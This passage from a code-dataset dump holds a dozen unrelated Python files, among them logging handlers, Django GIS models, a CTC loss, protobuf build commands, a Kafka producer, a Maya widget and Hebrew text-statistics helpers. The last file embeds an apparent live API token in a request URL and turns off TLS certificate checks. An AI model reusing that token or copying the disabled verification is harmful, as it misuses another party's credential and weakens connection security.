logging.FileHandler(KBASE_TMP_LOGFILE)\n hndlr.setFormatter(MetaFormatter())\n g_log.addHandler(hndlr)\n\n # If local forwarder is available, add that one too\n has_local_forwarder = True\n config_file = os.environ.get(KBASE_PROXY_ENV, None)\n proxy_config = log_proxy.ProxyConfiguration(config_file)\n # Attempt a connection\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((proxy_config.host, proxy_config.port))\n except socket.error:\n has_local_forwarder = False\n g_log.debug(\"init_handlers local_forwarder=false\")\n # If connection succeeds, add a logging.handler\n if has_local_forwarder:\n g_log.debug(\"init_handlers local_forwarder=true\")\n sock_handler = SocketHandler(proxy_config.host,\n proxy_config.port)\n g_log.addHandler(sock_handler)\n else:\n g_log.debug(\"init_handlers local_forwarder=false\")\n\ndef reset_handlers():\n \"\"\"Remove & re-add all handlers.\n \"\"\"\n while g_log.handlers:\n g_log.removeHandler(g_log.handlers.pop())\n init_handlers()\n\n## Run the rest of this on import\n\n# Get root log obj.\ng_log = get_logger()\n\n# If no handlers, initialize them\nif not g_log.handlers:\n init_handlers()\n","sub_path":"src/biokbase/narrative/common/kblogging.py","file_name":"kblogging.py","file_ext":"py","file_size_in_byte":4856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"163624038","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLocation - app to save location aware objects into the database.\nThis is created for ASI (Aalto Social Interface).\n\nPostGIS data type 'geography' is used instead of traditional geometry. For further details, see:\nhttp://postgis.refractions.net/documentation/manual-1.5/ch04.html#PostGIS_GeographyVSGeometry\n\"\"\"\n\nimport string\nimport random\n\nfrom django.conf import settings\nfrom django.contrib.gis.db import models\nfrom django.contrib.auth.models import User\n\ndef get_guid(length=12):\n \"\"\"\n Generate and return a random string which can be considered unique.\n Default length is 12 characters from set [a-zA-Z0-9].\n \"\"\"\n alphanum = string.letters + string.digits\n return ''.join([alphanum[random.randint(0,len(alphanum)-1)] for i in xrange(length)])\n\nclass Entity(models.Model):\n \"\"\"\n Entity is an object with geographical coordinates.\n Fields:\n * guid, globally unique id, usually a random string\n * user, foreign key to an Auth.User object\n * name, optional\n * description, optional\n * created and updated, auto-timestamps\n * geography, GIS field for location (see PostGIS 1.5) or\n http://workshops.opengeo.org/postgis-intro/geography.html\n \"\"\"\n guid = models.CharField(max_length=40, default=get_guid, unique=True, db_index=True)\n user = models.ForeignKey(User, blank=True, null=True)\n name = models.CharField(max_length=150, blank=True, default='', editable=True)\n description = models.TextField(blank=True, default='', editable=True)\n created = models.DateTimeField(auto_now_add=True, editable=False)\n updated = models.DateTimeField(auto_now=True, editable=False)\n objects = models.GeoManager()\n geography = models.PointField(geography=True, editable=True)\n\n def __unicode__(self):\n return u\"%s (%s)\" % (self.name, str(self.geography)[:50])\n","sub_path":"MestaDB/mestadb/location/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"555869084","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\nfrom ..functions.ctc_loss import CTCLossFunction\n\n\nclass CTCLoss(nn.Module):\n \"\"\"\n Criterion to compute CTC Loss as described in ``_\n\n :param size_average: if compute average loss (only if reduce is True)\n :param reduce: if compute mean or average loss (if None, returns full tensor of shape ``(batch_size,)``)\n :param after_logsoftmax: if logsoftmax is used before passing neural network outputs \\n\n (else takes pure network outputs)\n :param time_major: if logits are time major (or batch major), default ``True``\n :param blank_idx: id of blank label, default ``0``\n \"\"\"\n\n def __init__(self, size_average=None, reduce=None, after_logsoftmax=False, time_major=False, blank_idx=0):\n super(CTCLoss, self).__init__()\n self._blank_index = blank_idx\n self._reduce = reduce\n self._size_average = size_average\n self._after_logsoftmax = after_logsoftmax\n self._time_major = time_major\n\n def forward(self, logits, targets, logits_lengths, targets_lengths):\n \"\"\"\n Computes CTC Loss\n\n :param logits: Float or Double Tensor (network output)\n of shape ``(sequence_length, batch_size, alphabet_size)`` if ``time_major`` is True,\n else of shape ``(batch_size, sequence_length, alphabet_size)``\n :param targets: Tensor with targets of shape ``(batch_size, targets_sequence_length)``\n :param logits_lengths: Tensor of shape ``(batch_size,)`` with lengths of sequences\n :param targets_lengths: Tensor of shape ``(batch_size,)`` with lengths of target sequences\n :return: tensor with CTC loss of shape ``(batch_size,)`` if ``reduce is None`` else of shape ``(1,)``\n \"\"\"\n if self._after_logsoftmax:\n logits_logsoftmax = logits\n else:\n logits_logsoftmax = F.log_softmax(logits, dim=2)\n\n if self._time_major:\n logits_logsoftmax = logits_logsoftmax.permute(1, 0, 2)\n # shape of logits_logsoftmax now: batch_size, sequence_length, alphabet_size\n\n loss = CTCLossFunction().apply(logits_logsoftmax, targets, logits_lengths, targets_lengths, self._blank_index)\n\n if self._reduce:\n if self._size_average:\n return loss.mean()\n else:\n return loss.sum()\n return loss\n","sub_path":"pytorch_end2end/modules/ctc_loss.py","file_name":"ctc_loss.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"240880021","text":"from distutils.spawn import find_executable\nfrom distutils.command.build import build\nfrom distutils.command.clean import clean\nfrom distutils.cmd import Command\nfrom distutils import log\nimport sys\nimport os\n\nclass clean_proto(clean):\n def run(self):\n clean.run(self)\n for package in self.distribution.packages:\n for root, dirs, files in os.walk(package):\n for filename in files:\n path = os.path.join(root, filename)\n if self.is_pb2_file(filename):\n log.info(\"removing generated file '%s'\" % path)\n os.remove(path)\n\n def is_pb2_file(self, filename):\n base, u, rest = filename.rpartition('_')\n return rest == 'pb2.py'\n\nclass build_proto(Command):\n description = \"build .proto files into Python modules\"\n user_options = [\n ('protoc=', None, 'location of the protoc compiler'),\n ('indir=', 'i', 'where to find the *.proto files to compile'),\n ('outdir=', 'o', 'where to output the generated Python code'),\n ('force', 'f', 'forcibly build everything (ignore file timestamps)')]\n\n boolean_options = ['force']\n\n def initialize_options(self):\n self.indir = None\n self.outdir = None\n self.protoc = None\n self.force = None\n\n def finalize_options(self):\n self.set_undefined_options('build', ('force', 'force'))\n\n if self.indir is None:\n self.indir = os.path.join('.', 'src')\n if self.outdir is None:\n self.outdir = os.path.join('.', self.distribution.packages[0])\n\n if self.protoc is None:\n self.protoc = find_executable('protoc')\n if self.protoc is None:\n raise RuntimeError(\"No protoc compiler was found!\")\n\n def run(self):\n for protofile in self.get_proto_files():\n outputfile = self.pb2_filename(protofile)\n outputdir = os.path.dirname(outputfile)\n self.make_file(protofile, outputfile, self.generate_proto, [protofile, outputdir])\n self.reinitialize_command('build_py')\n\n def get_proto_files(self):\n protos = []\n for root, dirs, files in os.walk(self.indir):\n for filename in files:\n if self.is_proto_file(filename):\n self.debug_print(\"Found protobuffs definition: %s\" % filename)\n protos.append(os.path.join(root, filename))\n return protos\n\n def is_proto_file(self, filename):\n base, dot, ext = filename.rpartition(\".\")\n return (ext == \"proto\")\n\n def pb2_filename(self, source):\n return source.replace(\".proto\", \"_pb2.py\").replace(self.indir, self.outdir)\n\n # Lifted and modified from the google project\n def generate_proto(self, source, outputdir):\n \"\"\"Invokes the Protocol Compiler to generate a _pb2.py from the given\n .proto file..\"\"\"\n\n protoc_command = [ self.protoc,\n \"-I%s\" % self.indir,\n \"--python_out=%s\" % outputdir,\n source ]\n result = self.spawn(protoc_command, 0)\n if result is not None and result[1] is not 0:\n raise SystemError(\"protoc command failed: '%s'\" % protoc_command.join(' '))\n\n# Inject our .proto compiler into the front of the build commands\nbuild.sub_commands.insert(0, ('build_proto', None))\n","sub_path":"proto_cmd.py","file_name":"proto_cmd.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"389305055","text":"__author__ = 'TzAnAnY'\n\nSAVED = {}\n\n\ndef patch_item(module, attr, new_item):\n obj = object()\n old_item = getattr(module, attr, obj)\n if old_item is not obj:\n SAVED.setdefault(module.__name__, {}).setdefault(attr, old_item)\n setattr(module, attr, new_item)\n\n\ndef patch_socks():\n from .httpclient import HTTPRequest\n import tornado.httpclient\n patch_item(tornado.httpclient, 'HTTPRequest', HTTPRequest)\n\n from .curl_httpclient import CurlAsyncHTTPClient\n import tornado.curl_httpclient\n patch_item(tornado.curl_httpclient, 'CurlAsyncHTTPClient', CurlAsyncHTTPClient)\n\n","sub_path":"monkey/patch.py","file_name":"patch.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"395346409","text":"from day5 import compile\ndef init():\n input = ''\n with open('./day7-input.txt', 'r', encoding='utf-8') as file:\n input = file.read()\n instructions = [int(piece) for piece in input.split(',')]\n return instructions\nprogram = init()\nprint(program)\n\ncompile(program)","sub_path":"day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"531290446","text":"import rospy\nfrom robot import Robot\n\n\ndef main():\n\n rospy.init_node('tr_control')\n\n rate = rospy.Rate(10)\n r = Robot()\n\n while not rospy.is_shutdown():\n r.publish_motors()\n rate.sleep()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tr_control/src/tr_control/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"274096927","text":"import json\n\nfrom kafka import KafkaProducer\n\nfrom code.servers import bootstrap_servers\nfrom code.topics import TOPIC_1\n\n\ndef on_send_success(record_metadata):\n print(f'PRODUCER: Send to {record_metadata.topic}:{record_metadata.partition}:{record_metadata.offset}')\n\n\ndef on_send_error(ex):\n print(f'PRODUCER: {ex}')\n # handle exception\n\n\ndef send_json_message(key: str, value: str):\n\n print('Start Producing')\n\n producer = KafkaProducer(bootstrap_servers=bootstrap_servers,\n value_serializer=lambda m: json.dumps(m).encode('ascii'))\n producer.send(TOPIC_1, {key: value})\\\n .add_callback(on_send_success)\\\n .add_errback(on_send_error)\n\n # block until all async messages are sent\n producer.flush()\n\n print('Finish Producing')\n return True\n\n\nif __name__ == '__main__':\n\n send_json_message('Key', 'Value')\n","sub_path":"code/messaging_async/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"28713275","text":"from PySide2 import QtWidgets, QtCore, QtGui\nfrom maya import OpenMayaUI as omui\nimport maya.cmds as m\nfrom shiboken2 import wrapInstance\nfrom peel_solve import time_util, roots, solve\nimport math\n\n\n\n\n\n\nclass TimeRangeWidget(QtWidgets.QWidget):\n\n def __init__(self, parent=None):\n \"\"\" The initialization includes setting up the UI framework for the tool window, which asks the user\n for the c3d files, as well as the start and end frames.\"\"\"\n\n super(TimeRangeWidget, self).__init__(parent)\n\n layout = QtWidgets.QVBoxLayout()\n\n self.ranges = QtWidgets.QTableWidget()\n self.ranges.setColumnCount(3)\n self.ranges.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)\n self.ranges.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)\n self.ranges.cellDoubleClicked.connect(self.select_event)\n\n layout.addWidget(self.ranges)\n\n low_bar = QtWidgets.QHBoxLayout()\n\n low_bar.addWidget(QtWidgets.QLabel(\"Start TC\"))\n self.tc_start = QtWidgets.QLineEdit()\n low_bar.addWidget(self.tc_start)\n\n low_bar.addWidget(QtWidgets.QLabel(\"TC Rate\"))\n self.tc_rate = QtWidgets.QLineEdit()\n low_bar.addWidget(self.tc_rate)\n\n low_bar.addWidget(QtWidgets.QLabel(\"Offset (sec)\"))\n self.tc_offset = QtWidgets.QLineEdit()\n low_bar.addWidget(self.tc_offset)\n\n low_bar.addWidget(QtWidgets.QLabel(\"Start#\"))\n self.frame_start = QtWidgets.QLineEdit()\n low_bar.addWidget(self.frame_start)\n\n self.solve_button = QtWidgets.QPushButton(\"Solve Selected\")\n self.solve_button.pressed.connect(self.do_solve)\n low_bar.addWidget(self.solve_button)\n\n self.solve_all_button = QtWidgets.QPushButton(\"Solve All\")\n self.solve_all_button.pressed.connect(self.do_solve_all)\n low_bar.addWidget(self.solve_all_button)\n\n low_bar.addStretch(1)\n\n layout.addItem(low_bar)\n\n self.setLayout(layout)\n\n self.resize(500, 250)\n\n self.populate()\n\n def clear(self):\n self.populate()\n\n def populate(self):\n self.ranges.setRowCount(0)\n self.ranges.clear()\n\n optical_root = roots.optical()\n if optical_root is None:\n self.tc_offset.setText(\"\")\n self.tc_rate.setText(\"\")\n self.tc_start.setText(\"\")\n return\n \n self.frame_start.setText(str(time_util.c3d_start(optical_root)))\n\n tc_standard = m.getAttr(optical_root + \".C3dTimecodeStandard\")\n offset = m.getAttr(optical_root + \".C3dFirstField\")\n rate = m.getAttr(optical_root + \".C3dRate\")\n self.tc_offset.setText(\"%.2f\" % (offset / rate))\n self.tc_rate.setText(str(tc_standard))\n\n hh = m.getAttr(optical_root + \".C3dTimecodeH\")\n mm = m.getAttr(optical_root + \".C3dTimecodeM\")\n ss = m.getAttr(optical_root + \".C3dTimecodeS\")\n ff = m.getAttr(optical_root + \".C3dTimecodeF\")\n\n self.tc_start.setText(\"%02d:%02d:%02d:%02d\" % (hh, mm, ss, ff))\n\n def add_range(self, name, start, end):\n row = self.ranges.rowCount()\n self.ranges.setRowCount(row+1)\n self.ranges.setItem(row, 0, QtWidgets.QTableWidgetItem(name))\n self.ranges.setItem(row, 1, QtWidgets.QTableWidgetItem(start))\n self.ranges.setItem(row, 2, QtWidgets.QTableWidgetItem(end))\n\n def get_range(self, row):\n tc_rate = float(self.tc_rate.text())\n\n c3d_start = time_util.c3d_start(roots.optical())\n\n start_tc = time_util.Timecode(str(self.ranges.item(row, 1).text()), tc_rate)\n end_tc = time_util.Timecode(str(self.ranges.item(row, 2).text()), tc_rate)\n\n print(\"Start: \" + start_tc.info())\n print(\"End: \" + end_tc.info())\n print(\"Offset: \" + c3d_start.info())\n\n a = start_tc - c3d_start\n b = end_tc - c3d_start\n\n a.set_rate(time_util.fps())\n b.set_rate(time_util.fps())\n\n print(\"Start: \" + a.info())\n print(\"End: \" + b.info())\n\n return a.frame(), b.frame()\n\n def select_event(self, row):\n start, end = self.get_range(row)\n\n m.playbackOptions(min=math.floor(start), max=math.ceil(end))\n\n def do_solve(self, all=False):\n for i in range(self.ranges.rowCount()):\n row = self.ranges.item(i, 0)\n if all is True or row.isSelected():\n start, end = self.get_range(i)\n solve.run(start=start, end=end)\n\n def do_solve_all(self):\n self.do_solve(all=True)\n\n\n\nclass TimeRanges(QtWidgets.QDialog):\n\n def __init__(self, parent=None):\n\n if parent is None:\n pointer = omui.MQtUtil.mainWindow()\n parent = wrapInstance(long(pointer), QtWidgets.QWidget)\n\n super(TimeRanges, self).__init__(parent)\n\n layout = QtWidgets.QVBoxLayout()\n self.table = TimeRangeWidget()\n layout.addWidget(self.table)\n self.setLayout(layout)\n self.resize(500, 250)\n\nINSTANCE = None\n\ndef show():\n \"\"\" Create the gui if it doesn't exist, or show if it does \"\"\"\n global INSTANCE\n if not INSTANCE:\n INSTANCE = TimeRanges()\n INSTANCE.show()\n return INSTANCE\n","sub_path":"python/peel_solve/time_range.py","file_name":"time_range.py","file_ext":"py","file_size_in_byte":5190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"579209489","text":"# Copyright 2021 Curtin University\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Author: James Diprose\n\nfrom __future__ import annotations\n\nimport json\nimport os\n\nfrom oaebu_workflows.config import elastic_mappings_folder\nfrom oaebu_workflows.dags.elastic_import_workflow import load_elastic_mappings_oaebu\nfrom observatory.platform.utils.config_utils import module_file_path\nfrom observatory.platform.utils.jinja2_utils import render_template\nfrom observatory.platform.utils.test_utils import ObservatoryEnvironment, ObservatoryTestCase\nfrom observatory.platform.utils.workflow_utils import make_dag_id\n\n\nclass TestElasticImportWorkflow(ObservatoryTestCase):\n \"\"\"Tests for the Elastic Import Workflow\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.project_id = os.getenv(\"TEST_GCP_PROJECT_ID\")\n self.data_location = os.getenv(\"TEST_GCP_DATA_LOCATION\")\n\n def test_load_elastic_mappings_oaebu(self):\n \"\"\"Test load_elastic_mappings_oaebu\"\"\"\n\n aggregate_level = \"product\"\n path = elastic_mappings_folder()\n expected = [\n (\n \"oaebu_anu_press_book_product_author_metrics\",\n render_template(\n os.path.join(path, \"oaebu-author-metrics-mappings.json.jinja2\"), aggregation_level=aggregate_level\n ),\n ),\n (\n \"oaebu_anu_press_book_product_list\",\n render_template(\n os.path.join(path, \"oaebu-list-mappings.json.jinja2\"), aggregation_level=aggregate_level\n ),\n ),\n (\n \"oaebu_anu_press_book_product_metrics\",\n render_template(\n os.path.join(path, \"oaebu-metrics-mappings.json.jinja2\"), aggregation_level=aggregate_level\n ),\n ),\n (\n \"oaebu_anu_press_book_product_metrics_city\",\n render_template(\n os.path.join(path, \"oaebu-metrics-city-mappings.json.jinja2\"), aggregation_level=aggregate_level\n ),\n ),\n (\n \"oaebu_anu_press_book_product_metrics_country\",\n render_template(\n os.path.join(path, \"oaebu-metrics-country-mappings.json.jinja2\"), aggregation_level=aggregate_level\n ),\n ),\n (\n \"oaebu_anu_press_book_product_metrics_events\",\n render_template(\n os.path.join(path, \"oaebu-metrics-events-mappings.json.jinja2\"), aggregation_level=aggregate_level\n ),\n ),\n (\n \"oaebu_anu_press_book_product_metrics_institution\",\n render_template(\n os.path.join(path, \"oaebu-metrics-institution-mappings.json.jinja2\"),\n aggregation_level=aggregate_level,\n ),\n ),\n (\n \"oaebu_anu_press_book_product_metrics_referrer\",\n render_template(\n os.path.join(path, \"oaebu-metrics-referrer-mappings.json.jinja2\"), aggregation_level=aggregate_level\n ),\n ),\n (\n \"oaebu_anu_press_book_product_publisher_metrics\",\n render_template(\n os.path.join(path, \"oaebu-publisher-metrics-mappings.json.jinja2\"),\n aggregation_level=aggregate_level,\n ),\n ),\n (\n \"oaebu_anu_press_book_product_subject_bic_metrics\",\n render_template(\n os.path.join(path, \"oaebu-subject-bic-metrics-mappings.json.jinja2\"),\n aggregation_level=aggregate_level,\n ),\n ),\n (\n \"oaebu_anu_press_book_product_subject_bisac_metrics\",\n render_template(\n os.path.join(path, \"oaebu-subject-bisac-metrics-mappings.json.jinja2\"),\n aggregation_level=aggregate_level,\n ),\n ),\n (\n \"oaebu_anu_press_book_product_subject_thema_metrics\",\n render_template(\n os.path.join(path, \"oaebu-subject-thema-metrics-mappings.json.jinja2\"),\n aggregation_level=aggregate_level,\n ),\n ),\n (\n \"oaebu_anu_press_book_product_subject_year_metrics\",\n render_template(\n os.path.join(path, \"oaebu-subject-year-metrics-mappings.json.jinja2\"),\n aggregation_level=aggregate_level,\n ),\n ),\n (\n \"oaebu_anu_press_book_product_year_metrics\",\n render_template(\n os.path.join(path, \"oaebu-year-metrics-mappings.json.jinja2\"), aggregation_level=aggregate_level\n ),\n ),\n (\n \"oaebu_anu_press_unmatched_book_metrics\",\n render_template(\n os.path.join(path, \"oaebu-unmatched-metrics-mappings.json.jinja2\"),\n aggregation_level=aggregate_level,\n ),\n ),\n (\n \"oaebu_anu_press_unmatched_book_metrics\",\n render_template(\n os.path.join(path, \"oaebu-unmatched-metrics-mappings.json.jinja2\"),\n aggregation_level=aggregate_level,\n ),\n ),\n (\n \"oaebu_anu_press_institution_list\",\n render_template(os.path.join(path, \"oaebu-institution-list-mappings.json.jinja2\")),\n ),\n ]\n\n for table_id, expected_mappings_str in expected:\n print(table_id)\n expected_mappings = json.loads(expected_mappings_str)\n actual_mappings = load_elastic_mappings_oaebu(path, table_id)\n self.assertEqual(expected_mappings, actual_mappings)\n\n def test_dag_load(self):\n \"\"\"Test that the DAG can be loaded from a DAG bag.\n\n :return: None\n \"\"\"\n\n env = ObservatoryEnvironment(self.project_id, self.data_location, enable_api=False)\n with env.create():\n expected_dag_ids = [\n make_dag_id(\"elastic_import\", suffix)\n for suffix in [\"anu_press\", \"ucl_press\", \"wits_university_press\", \"university_of_michigan_press\"]\n ]\n\n dag_file = os.path.join(module_file_path(\"oaebu_workflows.dags\"), \"elastic_import_workflow.py\")\n for dag_id in expected_dag_ids:\n self.assert_dag_load(dag_id, dag_file)\n","sub_path":"oaebu_workflows/workflows/tests/test_elastic_workflow.py","file_name":"test_elastic_workflow.py","file_ext":"py","file_size_in_byte":7163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"568935389","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\nfrom model import common\n\n\ndef make_model(args):\n return EPISTEMIC(args)\n\n\nclass EPISTEMIC(nn.Module):\n def __init__(self, config):\n super(EPISTEMIC, self).__init__()\n self.drop_rate = config.drop_rate\n in_channels = config.in_channels\n filter_config = (64, 128)\n\n self.encoders = nn.ModuleList()\n self.decoders = nn.ModuleList()\n\n # setup number of conv-bn-relu blocks per module and number of filters\n encoder_n_layers = (2, 2, 3, 3, 3)\n encoder_filter_config = (in_channels,) + filter_config\n decoder_n_layers = (3, 3, 3, 2, 1)\n decoder_filter_config = filter_config[::-1] + (filter_config[0],)\n\n for i in range(0, 2):\n # encoder architecture\n self.encoders.append(_Encoder(encoder_filter_config[i],\n encoder_filter_config[i + 1],\n encoder_n_layers[i]))\n\n # decoder architecture\n self.decoders.append(_Decoder(decoder_filter_config[i],\n decoder_filter_config[i + 1],\n decoder_n_layers[i]))\n\n # final classifier (equivalent to a fully connected layer)\n self.classifier = nn.Conv2d(filter_config[0], in_channels, 3, 1, 1)\n\n def forward(self, x):\n indices = []\n unpool_sizes = []\n feat = x\n\n # encoder path, keep track of pooling indices and features size\n for i in range(0, 2):\n (feat, ind), size = self.encoders[i](feat)\n if i == 1:\n feat = F.dropout(feat, p=self.drop_rate, training=True)\n indices.append(ind)\n unpool_sizes.append(size)\n\n # decoder path, upsampling with corresponding indices and size\n for i in range(0, 2):\n feat = self.decoders[i](feat, indices[1 - i], unpool_sizes[1 - i])\n if i == 0:\n feat = F.dropout(feat, p=self.drop_rate, training=True)\n\n output = self.classifier(feat)\n results = {'mean': output}\n\n return results\n\n\nclass _Encoder(nn.Module):\n def __init__(self, n_in_feat, n_out_feat, n_blocks=2):\n \"\"\"Encoder layer follows VGG rules + keeps pooling indices\n Args:\n n_in_feat (int): number of input features\n n_out_feat (int): number of output features\n n_blocks (int): number of conv-batch-relu block inside the encoder\n drop_rate (float): dropout rate to use\n \"\"\"\n super(_Encoder, self).__init__()\n\n layers = [nn.Conv2d(n_in_feat, n_out_feat, 3, 1, 1),\n nn.BatchNorm2d(n_out_feat),\n nn.ReLU()]\n\n if n_blocks > 1:\n layers += [nn.Conv2d(n_out_feat, n_out_feat, 3, 1, 1),\n nn.BatchNorm2d(n_out_feat),\n nn.ReLU()]\n\n self.features = nn.Sequential(*layers)\n\n def forward(self, x):\n output = self.features(x)\n return F.max_pool2d(output, 2, 2, return_indices=True), output.size()\n\n\nclass _Decoder(nn.Module):\n \"\"\"Decoder layer decodes the features by unpooling with respect to\n the pooling indices of the corresponding decoder part.\n Args:\n n_in_feat (int): number of input features\n n_out_feat (int): number of output features\n n_blocks (int): number of conv-batch-relu block inside the decoder\n drop_rate (float): dropout rate to use\n \"\"\"\n\n def __init__(self, n_in_feat, n_out_feat, n_blocks=2):\n super(_Decoder, self).__init__()\n\n layers = [nn.Conv2d(n_in_feat, n_in_feat, 3, 1, 1),\n nn.BatchNorm2d(n_in_feat),\n nn.ReLU()]\n\n if n_blocks > 1:\n layers += [nn.Conv2d(n_in_feat, n_out_feat, 3, 1, 1),\n nn.BatchNorm2d(n_out_feat),\n nn.ReLU()]\n\n self.features = nn.Sequential(*layers)\n\n def forward(self, x, indices, size):\n unpooled = F.max_unpool2d(x, indices, 2, 2, 0, size)\n return self.features(unpooled)\n","sub_path":"MCBN_src/model/epistemic.py","file_name":"epistemic.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"50149439","text":"import matplotlib.pyplot as plt\nfrom collections import Counter\nimport seaborn as sns\nimport requests\nfrom time import sleep\nimport pandas as pd\nfrom pandas.io.json import json_normalize\nfrom sklearn.feature_extraction.text import CountVectorizer\n\n\ndef split_by_whitespace(data):\n \"\"\"\n this function split the data by whitespace\n \"\"\"\n return data.split()\n\n\ndef count_word_number(text):\n \"\"\"\n this function return the number of words in the data\n \"\"\"\n return len(split_by_whitespace(text))\n\n\ndef plot_word_number_histogram(data):\n \"\"\"\n this function plot a histogram of the number of words in the data\n \"\"\"\n hist = dict()\n for idx, row in data.iterrows():\n cur_len = str(count_word_number(row['text']))\n if cur_len in hist.keys():\n hist[cur_len] += 1\n else:\n hist[cur_len] = 1\n new_hist = dict(sorted(hist.items(), key = lambda x:x[0]))\n plt.bar(new_hist.keys(), new_hist.values())\n plt.title(\"Word Number Histogram\")\n plt.xlabel(\"words\")\n plt.ylabel(\"frequancy\")\n plt.show()\n\n\ndef plot_top_20_common_words(data, file_name):\n \"\"\"\n this function plot the top 20 common words in the data\n \"\"\"\n general_counter = Counter()\n for idx, row in data.iterrows():\n general_counter += Counter(split_by_whitespace(row['text']))\n most = general_counter.most_common(20)\n x, y = [], []\n for word, count in most:\n x.append(word)\n y.append(count)\n fig = sns.barplot(x=y, y=invert_words(x))\n plt.title(\"Top commom words\")\n plt.ylabel(\"words\")\n plt.xlabel(\"frequancy\")\n plt.show()\n plt.savefig(\"statistic/\" + file_name + \".png\")\n\n\ndef plot_top_20_bigrams_words(data, file_name):\n \"\"\"\n This function plot the 20 common bigrams in the data\n \"\"\"\n vec = CountVectorizer(ngram_range = (2,2))\n bow = vec.fit_transform(list(data['text']))\n sum_words = bow.sum(axis=0)\n words_freq = [(word, sum_words[0, idx]) for word, idx in vec.vocabulary_.items()]\n words_freq = sorted(words_freq, key = lambda x: x[1], reverse=True)[:20]\n x, y = map(list, zip(*words_freq))\n fig = sns.barplot(x=y, y=invert_words(x))\n plt.title(\"Top Bigrams Barchart\")\n plt.ylabel(\"words\")\n plt.xlabel(\"frequancy\")\n plt.show()\n plt.savefig(\"statistic/\" + file_name + \".png\")\n\n\ndef invert_words(words):\n \"\"\"\n this function invert every word from the given list\n \"\"\"\n return [w[::-1] for w in words]\n\n\ndef plot_top_non_stop_words_barchart(data, file_name):\n \"\"\"\n this function plot toe non stop words barchart\n \"\"\"\n stop = get_hebrew_stop_words()\n general_counter = Counter()\n for idx, row in data.iterrows():\n non_stop_words_text = [word for word in row['text'].split() if word not in stop]\n general_counter += Counter(non_stop_words_text)\n most = general_counter.most_common(20)\n x, y = [], []\n for word, count in most:\n x.append(word)\n y.append(count)\n fig = sns.barplot(x=y, y=invert_words(x))\n plt.title(\"Top Non-Stopwords Barchart\")\n plt.ylabel(\"words\")\n plt.xlabel(\"frequancy\")\n plt.show()\n plt.savefig(\"statistic/\" + file_name + \".png\")\n\n\ndef get_hebrew_stop_words():\n \"\"\"\n this function return the hebrew stop words\n \"\"\"\n stop_words = \"heb_stopwords.txt\"\n with open(stop_words, encoding=\"utf-8\") as in_file:\n lines = in_file.readlines()\n res = [l.strip() for l in lines]\n return res\n\ndef plot_top_bigrams_non_stop_words_barchart(data, file_name):\n \"\"\"\n This function plot the 20 common bigrams non stop words\n \"\"\"\n vec = CountVectorizer(ngram_range = (2,2))\n bow = vec.fit_transform(list(data['text']))\n sum_words = bow.sum(axis=0)\n stop = get_hebrew_stop_words()\n words_freq = []\n for word, idx in vec.vocabulary_.items():\n flag = False\n for w in word.split():\n if w in stop:\n flag = True\n if not flag:\n words_freq.append((word, sum_words[0, idx]))\n words_freq = sorted(words_freq, key = lambda x: x[1], reverse=True)[:20]\n x, y = map(list, zip(*words_freq))\n fig = sns.barplot(x=y, y=invert_words(x))\n plt.title(\"Top bigrams non stop barchart\")\n plt.ylabel(\"words\")\n plt.xlabel(\"frequancy\")\n plt.show()\n plt.savefig(\"statistic/\" + file_name + \".png\")\n\n\ndef get_yap_analysis(text):\n \"\"\"\n this function return yap analysis\n \"\"\"\n text = text.replace(r'\"', r'\\\"')\n url = f'https://www.langndata.com/api/heb_parser?token=a70b54d01ef5e9c055ab9051b9deafee'\n _json = '{\"data\":\"' + text.strip() + '\"}'\n sleep(3)\n r = requests.post(url, data=_json.encode('utf-8'), headers={'Content-type': 'application/json; charset=utf-8'},\n verify=False)\n json_obj = r.json()\n md_lattice = json_obj[\"md_lattice\"]\n res_df = pd.io.json.json_normalize([md_lattice[i] for i in md_lattice.keys()])\n print(res_df)\n return res_df\n\n\ndef get_text_statistics(text, text_name):\n \"\"\"\n this function return the text statistics\n \"\"\"\n plot_top_20_common_words(text, \"commonWords_\" + text_name)\n plot_top_non_stop_words_barchart(text, \"commonNonStopwords_\" + text_name)\n plot_top_20_bigrams_words(text, \"commonBigrams_\" + text_name)\n plot_top_bigrams_non_stop_words_barchart(text, \"commonBigramsNonStopwords_\" + 